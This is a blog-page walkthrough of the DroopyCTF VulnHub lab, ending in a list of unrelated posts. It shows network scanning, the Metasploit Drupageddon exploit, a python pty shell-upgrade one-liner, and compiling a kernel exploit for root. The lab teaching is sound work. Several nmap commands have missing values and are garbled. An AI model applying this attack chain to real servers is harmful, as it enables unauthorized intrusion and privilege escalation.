DroopyCTF Walkthrough

Preparation:

Download the DroopyCTF virtual machine from the following website:

https://www.vulnhub.com/entry/droopy-v02,143/

1. Scan the network to find the IP address of the DroopyCTF server.

netdiscover -r 10.0.0.0/

2. Scan the DroopyCTF server using Nmap to find some potential vulnerabilities.

TCP Scan 1:

nmap -Pn -sS --stats-every 3m --max-retries  --max-scan-delay  --defeat-rst-ratelimit -T4 -p1- -oN /root/Delete/tcp1.txt 10.0.0.30

TCP Scan 2:

nmap -nvv -Pn- -sSV -p  --version-intensity  -A -oN /root/Delete/tcp2.txt 10.0.0.30

UDP Scan:

map -Pn --top-ports  -sU --stats-every 3m --max-retries  -T3 -oN /root/Delete/udp.txt 10.0.0.30

3. Browse the website(http://10.0.0.30/) through Firefox. Nothing valuable find in the source page.

Browse the website(http://10.0.0.30/robots.txt) through Firefox.

Browse the website(http://10.0.0.30/CHANGELOG.txt) through Firefox and try to find some vulnerabilities.

Try to find some exploit guider related to Drupal 7.0 in the Exploit Database. Download the exploit code

https://www.exploit-db.com/exploits/34992

We can also find some exploit titles on Kali Linux locally.

searchsploit drupal

We can also try to search for exploit modules related to drupal in Metasploit.

search drupal

4. Let's try to exploit the target server with Metasploit.

Use the exploit/multi/http/drupal_drupageddon module and show the information. It should be work.

Set the parameters and start to exploit. We have the shell.

Find the information of droopy server.

Try to find some exploit guider related to Linux Kernel 3.13.0 in the Exploit Database. Download the exploit code.

https://www.exploit-db.com/exploits/37292

Copy the code to the /var/www/html folder on Kali Linux, then download to the Droopy server.

Try to search the tty shell escapte cheat sheet on the Internet. https://netsec.ws/?p=337

python -c 'import pty; pty.spawn("/bin/sh")'

5. Download the exploit source code to /tmp folder on Droopy server. Compile and execute the exploit file.

Get the root privilege successfully.

OSCP Learning Notes - Capstone(3)的更多相关文章

  1. OSCP Learning Notes - Capstone(4)

    SickOS 1.2 Walkthrough Preparation: Down load the SickOS virtual machines from the following website ...

  2. OSCP Learning Notes - Capstone(2)

    BTRSys v2.1 Walkthrough Preparation: Download the BTRSys virtual machine from the following website: ...

  3. OSCP Learning Notes - Capstone(1)

    Kioptrix Level 1.1 Walkthrough Preparation: Download the virtual machine  from the following website ...

  4. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

  5. OSCP Learning Notes - Buffer Overflows(3)

    Finding Bad Characters 1. Find the bad charaters in the following website: https://bulbsecurity.com/ ...

  6. OSCP Learning Notes - Buffer Overflows(2)

    Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/sha ...

  7. OSCP Learning Notes - Buffer Overflows(1)

    Introduction to Buffer Overflows Anatomy of Memory Anatomy of the Stack Fuzzing Tools: Vulnserver -  ...

  8. OSCP Learning Notes - Netcat

    Introduction to Netcat Connecting va Listening Bind Shells Attacker connects to victim on listening ...

  9. OSCP Learning Notes - Enumeration(4)

    DNS Enumeration 1. Host Tool host is a simple utility for performing DNS lookups. It is normally use ...

随机推荐

  1. 06 . Jenkins分布式构建和Pipline

    Pipline简介 pipline 是帮助 Jenkins 实现 CI 到 CD 转变的重要角色,是运行在 jenkins 2.X 版本的核心插件,简单来 说 Pipline 就是一套运行于 Jenk ...

  2. 005.OpenShift访问控制-权限-角色

    一 Kubetcl namespace 1.1 namespace描述 Kubernetes namespace提供了将一组相关资源组合在一起的机制.在Red Hat OpenShift容器平台中,p ...

  3. MDX

    简介 把md文件里的图片转成base64,方便发给别人和上传博客园等博客平台 初衷 用Typora写markdown的感觉很爽,但是每当我写好一篇文章,想要发给小伙伴们炫耀炫耀,或者上传博客园,CSD ...

  4. 你的 IDEA 是如何配置的?卡不卡?试试这样配置

    本文作者在和同事的一次讨论中发现,对 IntelliJ IDEA 内存采用不同的设置方案,会对 IDE 的速度和响应能力产生不同的影响. Don't be a Scrooge and give you ...

  5. Codeforces Round #651 (Div. 2)

    感觉自己无可救药了. A题:找到小于等于n的两个不同的数的gcd最大是多少,显然是floort(n/2).设这两数是a * gcd, b * gcd然后gcd(a,b) = 1,那么gcd要尽量大,不 ...

  6. ubuntu18.04安装nodejs最新版、指定版 12.x 14.x

    今天准备在 ubuntu 服务器里面安装 nodejs 版本,ubuntu 18.04 仓库 nodejs 默认是 8.x 版本. 1. 通过 apt 安装 nodejs 在 Ubuntu 18.04 ...

  7. CentOS7 安装rz和sz命令,安装netstat

    yum install lrzsz CentOS7 安装netstat命令 yum install net-tools

  8. how to switch a different buffer from a terminal buffer

    In term-mode, any regular C-x whatever keybinding becomes C-c whatever instead.

  9. RSS阅读器推荐

    http://www.feeddemon.com/ Windows,Free (完)

  10. 08 . Kubernetes之 ingress及Ingress Controller

    Ingress简介 ingress是什么? 上篇文章介绍service时有说了暴露了service的三种方式ClusterIP.NodePort与LoadBalance,这几种方式都是在service ...